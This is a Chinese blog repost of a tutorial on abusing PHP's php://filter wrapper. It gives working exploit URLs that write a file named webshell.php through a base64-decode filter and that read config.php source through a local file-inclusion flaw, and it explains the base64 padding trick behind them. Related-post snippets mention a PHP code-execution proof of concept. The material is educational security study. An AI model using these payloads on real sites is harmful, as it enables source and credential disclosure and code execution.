php filter 漏洞,php://filter在php漏洞中的利用 -电脑资料

最新推荐文章于 2023-09-14 15:20:33 发布
最新推荐文章于 2023-09-14 15:20:33 发布
阅读量184 收藏
点赞数
文章标签: php filter 漏洞

1、php://filter基础

php.net中的描述,http://php.net/manual/zh/wrappers.php.php,

php.net中两个基本的例子:

/* 这会以大写字母输出 www.myhack58.com 的全部内容 */

readfile("php://filter/read=string.toupper/resource=http://www.myhack58.com");

/* 这会通过 rot13 过滤器筛选出字符 "Hello World"

然后写入当前目录下的 example.txt */

file_put_contents("php://filter/write=string.rot13/resource=example.txt","Hello World");

在这个例子中,php会先把Hello World字符串做string.rot13转换然后再写入文件,这在场景A中会有用到。

2、利用场景

A.在黑哥(膜拜黑哥)的关于[技术挑战-2]有提到,这里只说和php://filter有关的部分。

下面一段代码:

$str = ''.$_GET['c'];

$fname = $_GET['f'];

file_put_contents($fname,$str);

如何成功将phpinfo();写入文件并执行?利用上面提到的基础知识可以提交如下链接:

http://127.0.0.1:81/test.php?f=php%3A%2f%2ffilter%2fwrite%3Dconvert.base64-decode%2fresource%3Dwebshell.php&c=dddPD9waHBpbmZvKCk7Pz4

值得注意的有两点:

1). base64_decode()会忽略要解码字符串中无效字符像<>?;等,这里给出base64_decode()函数忽略无效字符相应的c函数代码

170    ch = base64_reverse_table[ch];

171    if ((!strict && ch < 0) || ch == -1) { /* a space or some other separator character, we simply skipo  ver */      www.myhack58.com

172      continue;

173    } else if (ch == -2) {

174      efree(result);

175      return NULL;

176    }

177

2). 将去掉无效字符时,补齐为4的倍数,例如这里去掉有效字符后是phpexit74,然后添加3个字符,补位为4的倍数,也就是c参数开头的三个d,php://filter在php漏洞中的利用》(https://www.unjs.com)。原因的话可以查看base64编码的原理。

B.本地文件包含

如果有这么一段代码:

include($_GET[‘file’]);

你想查看和本代码同一目录下config.php的内容。如何查看呢?

http://127.0.0.1:81/test.php?file=php://filter/convert.base64-encode/resource=config.php

3、参考:

http://www.*****.com/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability/

http://php.net/manual/zh/wrappers.php.php

weixin_39778106
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php://filter(文件包含漏洞利用)
MIGENGKING的博客
10-12 8152
“网址+/index.php?page=php://filter/convert.base64-encode/resource=index.php“ 例如: http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php 首先这是一个file关键字的ge...
php://filter(文件包含漏洞利用)及php://input
Sea_Sand息禅
11-17 5809
1. php://filter 文件包含漏洞:https://blog.csdn.net/fageweiketang/article/details/80699051 筛选过滤应用: 1、 字符串过滤器: string.rot13 对字符串执行ROT13转换 string.toupper转换为大写 string.tolower 转换为小写 string.strip_tags去除...
php filter 漏洞,PHPfilter_globals”结构任意代码执行漏洞
weixin_29539581的博客
03-17 153
发布日期:2012-02-17更新日期:2012-02-20受影响系统:PHP PHP 5.2.x不受影响系统:PHP PHP 5.3描述:--------------------------------------------------------------------------------BUGTRAQ ID: 52065PHP是一种在电脑上运行的脚本语言,主要用途是在于处理动态网页,...
php filter漏洞利用,PHP 'filter_globals'结构任意代码执行漏洞
weixin_35014204的博客
03-20 115
<?php/* This script generates a POST header that makes PHP 5.4.0RC6 *64 bit* try to execute code at 0x1111111111111111(C) Copyright 2012 Stefan EsserPHP 5.3.9 requires you to know the address of a ...
php filter 漏洞,利用php : //filter进行文件包含漏洞利用
weixin_39611389的博客
03-17 222
说实在话,使用PHP已有10年了,但从没研究过php://filter功能。今天一个偶然的机会,看到了一篇文章 LFI’s Exploitation Techniques,其描述了如何利用php://filter进行文件包含漏洞利用的。这才对php://filter进行研究。在php的官方文档有对php://filter说明,具体内容如下:具体使用方法如下:/* 这会以大写字母输出 www.e...
浅谈php://filter的妙用
10-17
在XXE漏洞利用,可以使用类似的方式,通过`php://filter`处理文件流,消除可能导致解析问题的特殊字符。 ### 巧妙利用编码与解码 编码和解码不仅可以帮助我们安全地读取文件,还可以用来规避一些限制。例如,...
phpfilter函数验证、过滤用户输入的数据
12-19
PHP编程,确保用户输入的安全性和有效性是至关重要的,因为不正确的用户输入可能会导致安全漏洞,例如SQL注入、跨站脚本攻击等。PHP提供了一套强大的过滤器(Filter)函数来帮助开发者验证和过滤来自非安全源的...
php使用filter_var函数判断邮箱,url,ip格式示例
10-16
`filter_var` 函数是 PHP 的一个强大工具,用于过滤和验证变量的值。它能够帮助开发者更加安全地处理输入数据,确保数据的格式正确,...在实际开发,应充分利用这个函数来过滤和验证用户输入,防止潜在的安全漏洞
php is_numberic函数造成的SQL注入漏洞
09-04
4. **使用`filter_var`**:PHP的`filter_var`函数可以更精确地过滤输入,特别是配合`FILTER_VALIDATE_INT`或`FILTER_VALIDATE_FLOAT`。 5. **严格的数据验证**:不只是检查是否是数字,还应检查输入是否符合预期的...
PHP文件包含fillter,利用php : //filter进行文件包含漏洞利用
weixin_34363835的博客
03-11 183
说实在话,使用PHP已有10年了,但从没研究过php://filter功能。今天一个偶然的机会,看到了一篇文章 LFI’s Exploitation Techniques,其描述了如何利用php://filter进行文件包含漏洞利用的。这才对php://filter进行研究。在php的官方文档有对php://filter说明,具体内容如下:具体使用方法如下:/* 这会以大写字母输出 www.e...
代码审计:php://filterphp漏洞利用
cherrie007的博客
07-17 1051
1、php://filter基础   php.net的描述,http://php.net/manual/zh/wrappers.php.phpphp://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和file_get_contents(),在数据流内容读取之前没有机会应
iwebsec靶场 文件包含漏洞通关笔记6-php://filter伪协议
最新发布
mooyuan的博客
09-14 339
php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件行。如果我们对其进行编码,就可以任意文件读取。
php filter 漏洞,php://filterphp漏洞利用
weixin_29189003的博客
03-17 368
1、php://filter基础php.net的描述,http://php.net/manual/zh/wrappers.php.phpphp://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和file_get_contents(),在数据流内容读取之前没有机会应用其他过滤...
php://filter
2202_75317918的博客
04-12 2861
php://filter
【Web安全】php://filter 的浅略底层分析
HBohan的博客
11-02 572
新建一个 php 文件:a.php <?php $a = "a.txt"; include("php://filter/resource=" . $a); 在同一目录下新建一个文件:a.txt(内容为 <?php phpinfo();?> 的 base64 编码) PD9waHAgcGhwaW5mbygpOz8+ 在对应文件的相关函数下个断点: 【资料】 贴一下关键代码: php_stream * php_stream_url_wrap_php(php_stream_wrapper
php://filter利用条件,浅谈php://filter技巧
weixin_33744799的博客
03-28 1138
php://filterphp://filter可以作为一个间流来处理其他流,具有四个参数:名称描述备注resource=指定了你要筛选过滤的数据流必选read=可以设定一个或多个过滤器名称,以管道符(|)分隔。可选write=可以设定一个或多个过滤器名称,以管道符(|)分隔。可选任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。巧用编码与解码$content ...
php://filter漏洞利用实例
AnywayC9的专栏
02-04 5579
根据php.net的描述,http://php.net/manual/zh/wrappers.php.phpphp://filter 是一种元封装器,其设计的目的是用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和file_get_contents(),在数据流内容读取之前没有机会应用其他过滤器。 在文件包含
详解php://filter以及死亡绕过
热门推荐
woshilnp的博客
05-25 1万+
详解php://filter以及死亡绕过 php://filter PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。 php:// — 访问各个输入/输出流(I/O streams) php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_ge
bugku CTF题
qq_46116117的博客
04-06 969
web题 矛盾: !is_numeric()函数: 用于检测变量是否为数字或数字字符串 如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE 需要num不为数字字符串或者数字,但num=1; 则,num=1*e0.1或num=1x,x为任意字符 web3 查看源代码得 <!--&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&
php://filter/read=convert.base64-encode/resource
08-18
- *1* [php://filter协议在任意文件读取漏洞利用(学习总结)](https://blog.csdn.net/L2329794714/article/details/121288668)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值